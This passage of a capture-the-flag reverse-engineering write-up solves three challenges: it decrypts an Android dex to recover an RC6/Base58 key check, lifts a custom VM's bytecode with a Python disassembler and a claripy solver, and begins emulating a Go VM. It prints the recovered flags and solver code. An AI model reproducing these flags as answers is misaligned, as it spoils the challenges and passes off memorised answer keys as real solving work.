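  }
  // app loader's pathList.dexElements := merged.toArray()
  v3 = CallObjectMethodV(a1, v8, v10);
  SetObjectField(a1, (int)v14, (int)v20, (int)v3);
  return SMC();
}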
其实主要逻辑就是读取 whoami.bin 解密并作为 dex 加载
解密 dex
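# whoami.bin -> whoami_dec.dex: XOR the first 32 bytes with 0x56 and the rest
# with 0x78 (the two loops of the native xxxxx() routine).  The paste dropped
# the index (``a ^= 0x56`` is a TypeError on a bytearray); files are closed
# via ``with``.
with open('./whoami.bin', 'rb') as fin:
    a = bytearray(fin.read())
for i in range(min(32, len(a))):   # min(): do not crash on a short file
    a[i] ^= 0x56
for i in range(32, len(a)):
    a[i] ^= 0x78
with open('./whoami_dec.dex', 'wb') as fout:
    fout.write(a)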
dex 部分反编译代码
/**
 * Key checker recovered from the decrypted dex (partial listing: the author
 * omitted encryptBlock() and base58()).  The constants below match RC6's
 * parameterisation (w = 32-bit words, r = 20 rounds, Pw = 0xB7E15163 and
 * Qw = 0x9E3779B9 as signed ints), which is how the writeup identified the
 * cipher; the alphabet is the Base58 one.
 */
public class GodBlessYou {
    private static int w = 32;
    private static int r = 20;
    private static int Pw = -1209970333;
    private static int Qw = -1640531527;
    private static int[] S = new int[(20 * 2) + 4];   // round-key table, 2r+4 words
    public static final char[] ALPHABET =
        "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz".toCharArray()
    ;
    private static final int[] INDEXES = new int[128];
    // (too long, left out by the author)

    /**
     * Accepts a 16-character key whose RC6 encryption under the fixed key
     * "tryyourbest!@#$%" base58-encodes to "QRWfeKdmtG5dzRuR3ZRxv5".
     * Any exception from the block cipher is treated as a wrong key.
     */
    public static boolean check(String content) {
        if (content != null && content.length() == 16) {
            try {
                byte[] cipherText = encryptBlock(content.getBytes(),
                    "tryyourbest!@#$%".getBytes());
                String result = base58(cipherText);
                if (result.equals("QRWfeKdmtG5dzRuR3ZRxv5")) {
                    return true;
                }
                return false;
            } catch (Exception e) {
                return false;
            }
        }
        return false;
    }
}
通过常量可以判断是 RC6 和 base58
在线网站解得 flag,flag{efds_&^#%@}
matrix
反编译脚本
import struct
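pc = 0   # VM program counter; advanced by the fetch*() helpers
# VM bytecode dumped from the binary.  The paste wrapped the hex literal over
# many lines without continuation (a SyntaxError); it is rebuilt here from
# adjacent string literals, one per original line, so it stays diffable.
code = bytes.fromhex(
    '001D1808831808002020001D18088319202483281D001D1880332820001'
    'D18803319B023331808000F20001D18803319B823331808001420001D18803319C02333'
    '180400241AFFFFFFFF3B20001D18803319C82333180400281AFFFFFFFF3B20001D1880331'
    '9C82333180408280518072841001D18803319C823331804082842001D18803319C02333'
    '1804082843001D18803319C82333180408001D18803319C0233318040840041A0700000'
    '0E01AC7070000B018072841002019C02333180408284218302843002019C023331804081'
    '83040041A07000000E01A9B070000B00020199C233318041800201A49050000B00020199'
    '8233318041800201AC1040000B000201994233318041800201A927E40002844002019902'
    '33318041800201A9F030000B00020198C233318041800201A17030000B00020199C23331'
    '8040828140020199023331804080020199C2333180408322805180728410020199023331'
    '804080020199C2333180408322842002019C023331804082843002019902333180408002'
    '0199C233318040832002019C0233318040840021A07000000E01A77020000B0002019982'
    '33318040828140020198C2333180408002019982333180408322805180728410020198C2'
    '333180408002019982333180408322842002019C0233318040828430020198C233318040'
    '800201998233318040832002019C0233318040840021A07000000E01A09020000B000201'
    '9B023331808080020198C2333180408002019C0233318040800201990233318040800201'
    '99C2333180408325A000020199823331804083232C2011802733318040828140020198C2'
    '333180408002019C823331804080020199023331804085A0032C201180273280F002019B'
    '023331808080020198C2333180408002019C023331804080020199023331804080020199'
    'C2333180408325A000020199823331804083232C20118027333180408002019B82333180'
    '8080020198C2333180408002019C823331804080020199023331804085A0032C20118027'
    '3331804085A0028051A4D7F40002844002019942333180408D201002019B023331808080'
    '020198C2333180408002019C023331804080020199023331804080020199C23331804083'
    '25A000020199823331804083232C20118027333180408002019B823331808080020198C2'
    '333180408002019C823331804080020199023331804085A0032C201180273331804085A0'
    '0D2020020199423331804002019942333180408002019B023331808080020198C2333180'
    '408002019C023331804080020199023331804080020199C2333180408325A00002019982'
    '3331804083232C20118027333180408002019B823331808080020198C233318040800201'
    '9C823331804080020199023331804085A0032C201180273331804085A00322018032841'
    'DA2B2842DA9428431A01000000B00020198C2333180408D2030020198C2333180400201'
    '98C23331804081801322018032841DA022842180128431A01000000B00020198C233318'
    '04082805180728410020198C23331804082842002019C8233318040828430020198C2333'
    '180408002019C8233318040840021AACFCFFFFE01A01000000B0002019902333180408D2'
    '0300201990233318040020199023331804081801322018032841DA022842180128431A01'
    '000000B00020199023331804082805180728410020199023331804082842002019C82333'
    '1804082843002019902333180408002019C8233318040840021A24FCFFFFE01A01000000'
    'B0002019982333180408C201280F0020199C2333180408C2011801730020199C23331804'
    '08C20133180473002019982333180408C201332814002019942333180408280500200020'
    '199C2333180408C2011801730020199C2333180408C20133180473002019982333180408'
    'C20133180273331880831804002019942333180408201AB27F4000284400201998233318'
    '0408D20400201998233318040020199823331804081801322018032841DA142842180128'
    '431A01000000B00020199823331804082805180728410020199823331804082842002019'
    'C023331804082843002019982333180408002019C0233318040840021A02FBFFFFE01A01'
    '000000B00020199C2333180408D2030020199C233318040020199C233318040818013220'
    '18032841DA022842180128431A01000000B00020199C2333180408280518072841002019'
    '9C23331804082842002019C0233318040828430020199C2333180408002019C023331804'
    '0840021A7AFAFFFFE01A01000000B000201988233318041800201AA7010000B000201984'
    '233318041800201A1F010000B0002019842333180408002019C023331804080020198823'
    '331804085A0032C201180273002019B0233318080833280F002019842333180408C20128'
    '24002019882333180408C20128140020002019882333180408C201180173002019882333'
    '180408C20133180473002019842333180408C20133180273331880831804082805002019'
    '842333180408002019C023331804080020198823331804085A0032C201180273002019B0'
    '23331808083318040020002019882333180408C201180173002019882333180408C20133'
    '180473002019842333180408C2013318027333188083180408201A508040002844002019'
    '842333180408D20500201984233318040020198423331804081801322018032841DA2228'
    '42180128431A01000000B000201984233318040828051807284100201984233318040828'
    '42002019C023331804082843002019842333180408002019C0233318040840021AA4FEFF'
    'FFE01A01000000B0002019882333180408D2030020198823331804002019882333180408'
    '1801322018032841DA022842180128431A01000000B00020198823331804082805180728'
    '410020198823331804082842002019C023331804082843002019882333180408002019C0'
    '233318040840021A1CFEFFFFE01A01000000B018042841001D28421920242843001D1920'
    '243318080828201A868040002844001D19202433180833180833281DA0'
)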
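def _fetch(fmt):
    """Decode one little-endian value of struct layout ``fmt`` at ``pc`` and advance past it.

    Shared by the four public fetch helpers so the width bookkeeping lives in
    one place; reads the module-level ``code`` and updates the global ``pc``.
    """
    global pc
    value = struct.unpack_from(fmt, code, pc)[0]
    pc += struct.calcsize(fmt)
    return value


def fetch():
    """Next unsigned byte."""
    return _fetch('<B')


def fetch2():
    """Next little-endian unsigned 16-bit value."""
    return _fetch('<H')


def fetch4():
    """Next little-endian unsigned 32-bit value."""
    return _fetch('<I')


def fetch8():
    """Next little-endian unsigned 64-bit value."""
    return _fetch('<Q')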
# Comparison predicates, indexed by the byte that follows a cmp opcode (64..68).
# The trailing "s" variants are the signed comparisons.
cmp_types = [
    '==', '!=', '<', '>=', '<=', '>', '<s', '>=s', '<=s', '>s'
]
# x86_regs = [
# 'rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi', 'rsp', 'rbp',
# 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15',
# 'rip', 'r17', 'r18', 'r19'
# ]
# Register-file offsets used by the read/write_x86reg opcodes (0 and 40),
# mapped to the host register they mirror.  Only the offsets that occur in
# ``code`` are listed; any other offset raises KeyError in vm_parse().
x86_regs = {
    5: 'rax',
    15: 'rcx',
    20: 'rdx',
    29: 'rsp',
    32: 'rbp',
    36: 'r8',
    40: 'r9',
    65: 'r17',
    66: 'r18',
    67: 'r19',
    68: 'rip',
}
def vm_parse():
    """Disassemble ``code`` from offset 0 to the end, one pseudo-C statement per opcode.

    Walks the bytecode with the module-level ``pc`` through the fetch*()
    helpers.  Only immediates are tracked on ``vm_stack`` — just enough to
    resolve the relative branches (opcodes 224 and 176), whose target is
    ``pc-1 + imm``; nothing else pops, so the list simply grows.  Targets are
    collected in ``labels`` as they are seen, so only forward targets get the
    blank line printed before their label.  ``vm_regs`` is allocated but never
    used.  Statements print with ``end=''`` and the next label starts a line.
    """
    global pc
    pc = 0
    vm_stack = []
    vm_regs = [0]*8
    labels = set()
    while pc < len(code):
        if pc in labels:
            print()
        print(f'L{pc:04X}: ', end='')
        opcode = fetch()
        match opcode:
            case 224:
                # conditional branch: displacement is the last pushed immediate
                target = (pc-1+vm_stack.pop())&0xFFFFFFFF
                labels.add(target)
                print(f'if (xf) goto_fixme L{target:04X};')
            case 176:
                # unconditional branch
                target = (pc-1+vm_stack.pop())&0xFFFFFFFF
                labels.add(target)
                print(f'goto_fixme L{target:04X};')
            case 8:
                print(f'load();', end='')
            case 32:
                print(f'memcpy();', end='')
            case 0:
                # operand byte selects the mirrored host register
                off = fetch()
                reg = x86_regs[off]
                print(f'read_x86reg({reg});', end='')
            case 40:
                off = fetch()
                reg = x86_regs[off]
                print(f'write_x86reg({reg});', end='')
            case 216:
                idx = fetch()
                print(f'push_reg1(tmp_{idx});', end='')
            case 217:
                idx = fetch()
                print(f'push_reg2(tmp_{idx});', end='')
            case 218:
                idx = fetch()
                print(f'push_reg4(tmp_{idx});', end='')
            case 219:
                idx = fetch()
                print(f'push_reg8(tmp_{idx});', end='')
            case 208:
                idx = fetch()
                print(f'tmp_{idx} = pop_reg1();', end='')
            case 209:
                idx = fetch()
                print(f'tmp_{idx} = pop_reg2();', end='')
            case 210:
                idx = fetch()
                print(f'tmp_{idx} = pop_reg4();', end='')
            case 211:
                idx = fetch()
                print(f'tmp_{idx} = pop_reg8();', end='')
            # immediates (1/2/4/8 bytes) are the only values kept on vm_stack
            case 24:
                imm = fetch()
                print(f'push_imm1({hex(imm)});', end='')
                vm_stack.append(imm)
            case 25:
                imm = fetch2()
                print(f'push_imm2({hex(imm)});', end='')
                vm_stack.append(imm)
            case 26:
                imm = fetch4()
                print(f'push_imm4({hex(imm)});', end='')
                vm_stack.append(imm)
            case 27:
                imm = fetch8()
                print(f'push_imm8({hex(imm)});', end='')
                vm_stack.append(imm)
            # case 28:
            # imm = fetch16()
            # print(f'push_imm16({hex(imm)});', end='')
            case 48:
                print(f'add1();', end='')
            case 49:
                print(f'add2();', end='')
            case 50:
                print(f'add4();', end='')
            case 51:
                print(f'add8();', end='')
            case 56:
                print(f'and1();', end='')
            case 57:
                print(f'and2();', end='')
            case 58:
                print(f'and4();', end='')
            case 59:
                print(f'and8();', end='')
            case 60:
                print(f'and16();', end='')
            # compares carry one operand byte: the predicate index into cmp_types
            case 64:
                cmp_type = fetch()
                print(f'xf = cmp1({cmp_types[cmp_type]});', end='')
            case 65:
                cmp_type = fetch()
                print(f'xf = cmp2({cmp_types[cmp_type]});', end='')
            case 66:
                cmp_type = fetch()
                print(f'xf = cmp4({cmp_types[cmp_type]});', end='')
            case 67:
                cmp_type = fetch()
                print(f'xf = cmp8({cmp_types[cmp_type]});', end='')
            case 68:
                cmp_type = fetch()
                print(f'xf = cmp16({cmp_types[cmp_type]});', end='')
            # div/mod/mul carry one operand byte (presumably signedness) that is
            # consumed but not shown in the listing
            case 72:
                sig = fetch()
                print(f'div1();', end='')
            case 73:
                sig = fetch()
                print(f'div2();', end='')
            case 74:
                sig = fetch()
                print(f'div4();', end='')
            case 75:
                sig = fetch()
                print(f'div8();', end='')
            case 76:
                sig = fetch()
                print(f'div16();', end='')
            case 80:
                sig = fetch()
                print(f'mod1();', end='')
            case 81:
                sig = fetch()
                print(f'mod2();', end='')
            case 82:
                sig = fetch()
                print(f'mod4();', end='')
            case 83:
                sig = fetch()
                print(f'mod8();', end='')
            case 84:
                sig = fetch()
                print(f'mod16();', end='')
            case 88:
                sig = fetch()
                print(f'mul1();', end='')
            case 89:
                sig = fetch()
                print(f'mul2();', end='')
            case 90:
                sig = fetch()
                print(f'mul4();', end='')
            case 91:
                sig = fetch()
                print(f'mul8();', end='')
            case 92:
                sig = fetch()
                print(f'mul16();', end='')
            case 96:
                print(f'or1();', end='')
            case 97:
                print(f'or2();', end='')
            case 98:
                print(f'or4();', end='')
            case 99:
                print(f'or8();', end='')
            case 100:
                print(f'or16();', end='')
            case 104:
                print(f'sar1();', end='')
            case 105:
                print(f'sar2();', end='')
            case 106:
                print(f'sar4();', end='')
            case 107:
                print(f'sar8();', end='')
            case 108:
                print(f'sar16();', end='')
            case 120:
                print(f'shr1();', end='')
            case 121:
                print(f'shr2();', end='')
            case 122:
                print(f'shr4();', end='')
            case 123:
                print(f'shr8();', end='')
            case 124:
                print(f'shr16();', end='')
            case 112:
                print(f'shl1();', end='')
            case 113:
                print(f'shl2();', end='')
            case 114:
                print(f'shl4();', end='')
            case 115:
                print(f'shl8();', end='')
            case 116:
                print(f'shl16();', end='')
            case 128:
                print(f'sub1();', end='')
            case 129:
                print(f'sub2();', end='')
            case 130:
                print(f'sub4();', end='')
            case 131:
                print(f'sub8();', end='')
            case 132:
                print(f'sub16();', end='')
            case 136:
                print(f'xor1();', end='')
            case 137:
                print(f'xor2();', end='')
            case 138:
                print(f'xor4();', end='')
            case 139:
                print(f'xor8();', end='')
            case 140:
                print(f'xor16();', end='')
            case 152:
                print(f'not1();', end='')
            case 153:
                print(f'not2();', end='')
            case 154:
                print(f'not4();', end='')
            case 155:
                print(f'not8();', end='')
            case 156:
                print(f'not16();', end='')
            case 194:
                # operand byte is a width; width 1 is printed as a no-op
                n = fetch()
                if n == 1:
                    print(f'nop();', end='')
                else:
                    print(f'mov_{n}();', end='')
            case 160:
                print(f'exit();', end='')
            case _:
                # unknown opcode: print its number so the dump stays aligned
                print(opcode)
        print()
vm_parse()   # run at import; the printed listing is what do_opt() below post-processes
用正则替换优化伪代码
import re
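# Peephole rewrite rules applied by do_opt() to the vm_parse() listing, as
# (pattern, replacement) pairs.  Multi-line patterns match consecutive
# "Lxxxx: " statements and fold a push/op sequence into one expression.
# Raw strings: ``\(``, ``\)``, ``\d``, ``\+`` and ``\g<n>`` are regex escapes,
# and as plain string escapes they are invalid (a SyntaxWarning on 3.12+).
# Continuation lines stay at column 0 because they are part of the pattern.
baby = [
    [r"""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);
L.{4}: push_imm2\((.*)\);
L.{4}: add8\(\);""", r'push(\g<1>+\g<2>+\g<3>);'],
    [r"""read_x86reg\((.*)\);
L.{4}: push_imm2\((.*)\);
L.{4}: add8\(\);""",
     r'push(\g<1>+\g<2>);'],
    [r"""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);""",
     r'push(\g<1>+\g<2>);'],
    [r"""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: sub8\(\);""",
     r'push(\g<1>-\g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: sub8\(\);""",
     r'push((\g<1>)-\g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm2\((.*)\);
L.{4}: sub8\(\);""",
     r'push((\g<1>)-\g<2>);'],
    [r"""read_x86reg\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add8\(\);""",
     r'push(\g<1>+(\g<2>));'],
    [r"""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add8\(\);""",
     r'push((\g<1>)+(\g<2>));'],
    [r"""read_x86reg\((.*)\);
L.{4}: push_imm4\((.*)\);
L.{4}: and8\(\);""",
     r'push(\g<1>&\g<2>);'],
    [r"""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: mul4\(\);""",
     r'push((\g<1>)*(\g<2>));'],
    [r"""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: load\(\);""",
     r'push(load_dword(\g<1>));'],
    [r"""push\((.*)\);
L.{4}: push_imm1\(0x8\);
L.{4}: load\(\);""",
     r'push(load_qword(\g<1>));'],
    [r"""push\((.*)\);
L.{4}: push_imm1\(0x8\);
L.{4}: read_x86reg\((.*)\);
L.{4}: memcpy\(\);""",
     r'write8(\g<1>, \g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: push_imm1\((.*)\);
L.{4}: memcpy\(\);""",
     r'write4(\g<1>, \g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: push\((.*)\);
L.{4}: memcpy\(\);""",
     r'write4(\g<1>, \g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add4\(\);""",
     r'push((\g<1>)+\g<2>);'],
    [r"""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add4\(\);""",
     r'push((\g<1>)+(\g<2>));'],
    [r"""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: shl8\(\);""",
     r'push(((\g<1>)<<\g<2>));'],
    [r"""push\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""read_x86reg\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""push_imm1\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""push_imm2\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""push_imm4\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""push_reg4\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
     r'\g<2> = \g<1>;'],
    [r"""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);""",
     r'push((\g<1>)+\g<2>);'],
    # register-save noise (r17..r19, rax, rdx, rcx, rip) is dropped outright
    [r"""r17 = .*;
L.{4}: r18 = .*;
L.{4}: r19 = .*;
L.{4}: """,
     ''],
    [r"""rax = .*;
L.{4}: """,
     ''],
    [r"""rdx = .*;
L.{4}: """,
     ''],
    [r"""rcx = .*;
L.{4}: """,
     ''],
    [r"""rip = .*;
L.{4}: """,
     ''],
    [r"""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: xf = cmp\d\((.*)\);""",
     r'xf = (\g<1>) \g<3> (\g<2>);'],
    [r"""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: xf = cmp\d\((.*)\);""",
     r'xf = (\g<1>) \g<3> (\g<2>);'],
    # branches: the preceding immediate is the displacement vm_parse() already resolved
    [r"""push_imm4\((.*)\);
L.{4}: goto_fixme (L.{4});""",
     r'goto \g<2>;'],
    [r"""push_imm4\((.*)\);
L.{4}: if \(xf\) goto_fixme (L.{4});""",
     r'if (xf) goto \g<2>;'],
    [r"""L.{4}: nop\(\);
""",
     ''],
    [r"""push\(.*\);
L.{4}: tmp_\d+ = pop_reg4\(\);
L.{4}: """,
     ''],
]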
# 0x2384 v0
# 0x2388 v1
# 0x238c v2
# 0x2390 v3
# 0x2394 v4
# 0x2398 v5
# 0x239c v6
# 0x23b0 v7 qword
# 0x23b8 v8 qword
# 0x23c0 v9
# 0x23c8 v10
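# Second pass: the frame pointer is rsp+0x80, and the rbp-relative slots listed
# in the comments above are renamed v0..v10.  Raw strings for the same reason
# as ``baby`` (``\(`` / ``\+`` / ``\g<n>`` are regex escapes, not string ones).
baby2 = [
    [r"""write4\(rsp\+0x80""", 'write4(rbp'],
    [r"""write8\(rsp\+0x80""", 'write8(rbp'],
    [r"""load_dword\(rsp\+0x80""", 'load_dword(rbp'],
    [r"""load_qword\(rsp\+0x80""", 'load_qword(rbp'],
    [r"""write4\(rbp\+0x2384, (.*)\);""", r'v0 = \g<1>;'],
    [r"""write4\(rbp\+0x2388, (.*)\);""", r'v1 = \g<1>;'],
    [r"""write4\(rbp\+0x238c, (.*)\);""", r'v2 = \g<1>;'],
    [r"""write4\(rbp\+0x2390, (.*)\);""", r'v3 = \g<1>;'],
    [r"""write4\(rbp\+0x2394, (.*)\);""", r'v4 = \g<1>;'],
    [r"""write4\(rbp\+0x2398, (.*)\);""", r'v5 = \g<1>;'],
    [r"""write4\(rbp\+0x239c, (.*)\);""", r'v6 = \g<1>;'],
    [r"""write8\(rbp\+0x23b0, (.*)\);""", r'v7 = \g<1>;'],
    [r"""write8\(rbp\+0x23b8, (.*)\);""", r'v8 = \g<1>;'],
    [r"""write4\(rbp\+0x23c0, (.*)\);""", r'v9 = \g<1>;'],
    [r"""write4\(rbp\+0x23c8, (.*)\);""", r'v10 = \g<1>;'],
    [r"""load_dword\(rbp\+0x2384\)""", 'v0'],
    [r"""load_dword\(rbp\+0x2388\)""", 'v1'],
    [r"""load_dword\(rbp\+0x238c\)""", 'v2'],
    [r"""load_dword\(rbp\+0x2390\)""", 'v3'],
    [r"""load_dword\(rbp\+0x2394\)""", 'v4'],
    [r"""load_dword\(rbp\+0x2398\)""", 'v5'],
    [r"""load_dword\(rbp\+0x239c\)""", 'v6'],
    [r"""load_qword\(rbp\+0x23b0\)""", 'v7'],
    [r"""load_qword\(rbp\+0x23b8\)""", 'v8'],
    [r"""load_dword\(rbp\+0x23c0\)""", 'v9'],
    [r"""load_dword\(rbp\+0x23c8\)""", 'v10'],
    # ['\((v\d+)\)', '\g<1>'],
]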
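def _rewrite_to_fixpoint(text, rules):
    """Apply every (pattern, replacement) pair in *rules* until *text* stops changing."""
    while True:
        before = text
        for pattern, replacement in rules:
            text = re.sub(pattern, replacement, text)
        # compare the text itself rather than hash() values: same cost for
        # our purposes and no (theoretical) collision can stop a pass early
        if text == before:
            return text


def do_opt(src='vm.txt', dst='vm_opt.txt'):
    """Peephole-simplify the lifted VM listing in *src* and write it to *dst*.

    The ``baby`` rules are applied first and the ``baby2`` rules second, in
    the same order as before; each rule set is re-run until a pass makes no
    change, so matches exposed by an earlier rewrite are still picked up.

    Args:
        src: path of the raw listing to read; the default keeps the original
            behaviour of reading ``vm.txt`` from the working directory.
        dst: path the simplified listing is written to.
    """
    # `with` closes the handles; the original left both files open
    with open(src, encoding='utf-8') as fh:
        code = fh.read()
    code = _rewrite_to_fixpoint(code, baby)
    code = _rewrite_to_fixpoint(code, baby2)
    with open(dst, 'w', encoding='utf-8') as fh:
        fh.write(code)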
# run the rewrite passes as soon as the script is executed
do_opt()
优化后的伪代码
L0000: write8(rsp-0x8, rbp);
L000A: rsp = (rsp-0x8)-0x2420;
L0015: rbp = rsp+0x80;
L001C: matrix = rcx;
L002A: key = rdx;
L0038: v9 = r8&0xffffffff;
L004C: v10 = r9&0xffffffff;
L0060: xf = (v10) <= (v9);
L00A8: if (xf) goto L00B4;
L00AE: goto L087A;
L00B4: xf = v9 <= 0x30;
L00D4: if (xf) goto L00E0;
L00DA: goto L087A;
L00E0: v6 = 0x0;
L00EB: goto L0639;
L00F1: v5 = 0x0;
L00FC: goto L05C2;
L0102: v4 = 0x0;
L010D: v3 = 0x0;
L011F: goto L04C3;
L0125: v2 = 0x0;
L0130: goto L044C;
L0136: xf = (v3+v6) < v9;
L0198: if (xf) goto L01A4;
L019E: goto L041A;
L01A4: xf = ((v2)+(v5)) < (v9);
L0206: if (xf) goto L0212;
L020C: goto L041A;
L0212: v4 +=
(load_dword(matrix+(((v2+((v9*(v3+v6))+v5))<<0x2))))*(load_dword(key+((((v2)+(v10*v3))
<<0x2))));
L0408: goto L041A;
L041A: v2 = v2+0x1;
L043A: goto L044C;
L044C: xf = v2 < v10;
L0485: if (xf) goto L0136;
L048B: goto L0491;
L0491: v3 += 0x1;
L04B1: goto L04C3;
L04C3: xf = (v3) < (v10);
L04FC: if (xf) goto L0125;
L0502: goto L0508;
L0508: write4((rbp+(((((((v6<<0x1))+v6)<<0x4))+v5)<<0x2))-0x80, v4);
L0589: v5 += 0x1;
L05B0: goto L05C2;
L05C2: xf = (v5) < (v9);
L05FB: if (xf) goto L0102;
L0601: goto L0607;
L0607: v6 = (v6)+0x1;
L0627: goto L0639;
L0639: xf = (v6) < (v9);
L0672: if (xf) goto L00F1;
L0678: goto L067E;
L067E: v1 = 0x0;
L0689: goto L0835;
L068F: v0 = 0x0;
L069A: goto L07BE;
L06A0: r8 = v0;
L06DC: write4(((v0+v9*v1)<<0x2)+matrix,
load_dword((rbp+(((((v1<<0x1)+v1)<<0x4)+v0)<<0x2))-0x80));
L0785: v0 = (v0)+0x1;
L07AC: goto L07BE;
L07BE: xf = (v0) < (v9);
L07F7: if (xf) goto L06A0;
L07FD: goto L0803;
L0803: v1 = (v1)+0x1;
L0823: goto L0835;
L0835: xf = (v1) < (v9);
L086E: if (xf) goto L068F;
L0874: goto L087A;
L087A: rbp = load_qword(rsp+0x2420);
L0892: rsp = ((rsp+0x2420)+0x8)+0x8;
L08A7: exit();
用 py 重写算法并解密矩阵
import pprint
from claripy import *
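# 3x3 key the VM slides over the input matrix
key_matrix = [
    [0x000000DE, 0x000000ED, 0x000000BE],
    [0x000000FE, 0x00000011, 0x000000F3],
    [0x0000003C, 0x000000F9, 0x000000FE],
]
# sizes the VM receives in r8 / r9 (v9 = matrix side, v10 = key side)
v9 = 6
v10 = 3
# one 32-bit symbolic cell per matrix entry; the loop below overwrites this
# matrix in place, so an untouched copy of the symbols is kept in matrix_orig
matrix = [[BVS('', 32) for _ in range(6)] for _ in range(6)]
# NOTE(review): the published listing shows `matrix[:]` here; the row index
# `[i]` was swallowed by the forum's italic markup. Without it every entry of
# matrix_orig is a copy of the whole matrix and the final batch_eval gets
# lists instead of symbols — this restores the per-row copy.
matrix_orig = [row[:] for row in matrix]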
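solve = Solver()
# Every plaintext cell must be a hex digit (the recovered flag is a hex
# string). Added before the in-place encryption below replaces the symbols.
# NOTE(review): the published listing reads `matrix[j]` — the `[i]` was eaten
# by forum markup, which would compare a whole row (a Python list) to an int.
for i in range(6):
    for j in range(6):
        cell = matrix[i][j]
        solve.add(
            Or(
                And(cell >= ord('0'), cell <= ord('9')),
                And(cell >= ord('a'), cell <= ord('f')),
                And(cell >= ord('A'), cell <= ord('F')),
            ))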
# expected ciphertext: 6x6 dwords the encrypted matrix has to equal
enc_matrix = [
    [0x20B3D, 0x1920F, 0x20705, 0x1C46F, 0x15EB7, 0x079D8],
    [0x1E5D1, 0x1A563, 0x1E591, 0x1E7E7, 0x10E43, 0x09C3A],
    [0x1E8EF, 0x1C8E6, 0x1C9F5, 0x1BC1F, 0x13C14, 0x098A6],
    [0x1E90E, 0x1C672, 0x1E866, 0x196B7, 0x1307D, 0x06C1A],
    [0x166CF, 0x1400F, 0x13D7E, 0x11D1F, 0x0BE1D, 0x06012],
    [0x0AA6D, 0x08490, 0x088E6, 0x088E6, 0x060D2, 0x02ED4],
]
# Python version of the nested loops in the optimised listing: a v10 x v10
# window of the key is laid over every cell and the cell is replaced by the
# windowed dot product. The update is in place, exactly like the VM; a cell
# is only ever read at (row+kr, col+kc) with kr, kc >= 0, i.e. from cells
# that have not been rewritten yet, so the order of updates is safe.
if v10 <= v9 <= 0x30:
    for row in range(v9):
        for col in range(v9):
            acc = 0
            for kr in range(v10):
                for kc in range(v10):
                    if row + kr < v9 and col + kc < v9:
                        acc += matrix[row + kr][col + kc] * key_matrix[kr][kc]
            matrix[row][col] = acc
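# bind every encrypted cell to the dumped ciphertext
# NOTE(review): the published listing reads `matrix[j] == enc_matrix[j]`; the
# `[i]` was eaten by forum markup and would compare rows instead of cells.
for i in range(6):
    for j in range(6):
        solve.add(matrix[i][j] == enc_matrix[i][j])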
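# flatten the untouched symbols row-major so each model prints as the
# 36-character plaintext
# NOTE(review): the published listing appends `matrix_orig[j]` (a row); the
# `[i]` lost to forum markup is restored so single symbols are evaluated.
mat = [matrix_orig[i][j] for i in range(6) for j in range(6)]
for x in solve.batch_eval(mat, 10):
    print(bytes(x))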
# b'c9d0d8b8f8b216119ead79c61da6e1b16666'
machine
go 编写的 vm 赛题,手动翻译成 py 脚本以便于调试
vm 反编译的伪代码太长了看不懂,尝试动调找规律
输入 b'\x00'*50,断在 check 指令处能看到部分明文 flag,反复操作几次后就能得到完整 flag
import struct
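pc = 0  # VM program counter in bytes, advanced by fetch8()
# read the whole bytecode once; `with` closes the handle the original leaked
with open('./code.dat', 'rb') as _bytecode:
    code = _bytecode.read()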
def fetch8():
    """Return the next little-endian 64-bit word of ``code`` and move ``pc`` past it."""
    global pc
    (word,) = struct.unpack_from('<Q', code, pc)
    pc += 8
    return word
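def vm_exec(flag=b'\x00' * 50):
    """Run the VM bytecode in ``code`` against ``flag`` and report the first failed check.

    The VM is a stack machine with eight 64-bit registers.  Opcode 12 consumes
    one byte of ``flag`` per execution and opcode 14 pops a value that must be
    zero; the first non-zero value is printed as raw bytes — that is where the
    partial plaintext shows up — and the process exits.  If the bytecode runs
    to its end, ``flag`` is printed.

    Args:
        flag: candidate input bytes; the default keeps the original all-zero
            probe, callers can pass the pieces recovered so far.

    Raises:
        SystemExit: after the first non-zero check value has been printed.
        IndexError: if the bytecode reads more input bytes than ``flag`` holds.
    """
    global pc
    pc = 0
    vm_stack = []
    vm_regs = [0] * 8
    # 734f1698
    # flag = b'734f1698'+b'a5775ec2'+b'6cd2e11e'+b'd4791e77'+bytes.fromhex('0d0a')
    flag_index = 0
    mask64 = 0xFFFFFFFFFFFFFFFF
    # opcode -> operation on (top, next) of the stack; results that can grow
    # past 64 bits are truncated, as the VM does
    binops = {
        3: lambda a, b: (a + b) & mask64,    # push(pop()+pop())
        5: lambda a, b: (a * b) & mask64,    # push(pop()*pop())
        7: lambda a, b: (a ^ b) & mask64,    # push(pop()^pop())
        8: lambda a, b: (a << b) & mask64,   # push(pop()<<pop())
        9: lambda a, b: a >> b,              # push(pop()>>pop())
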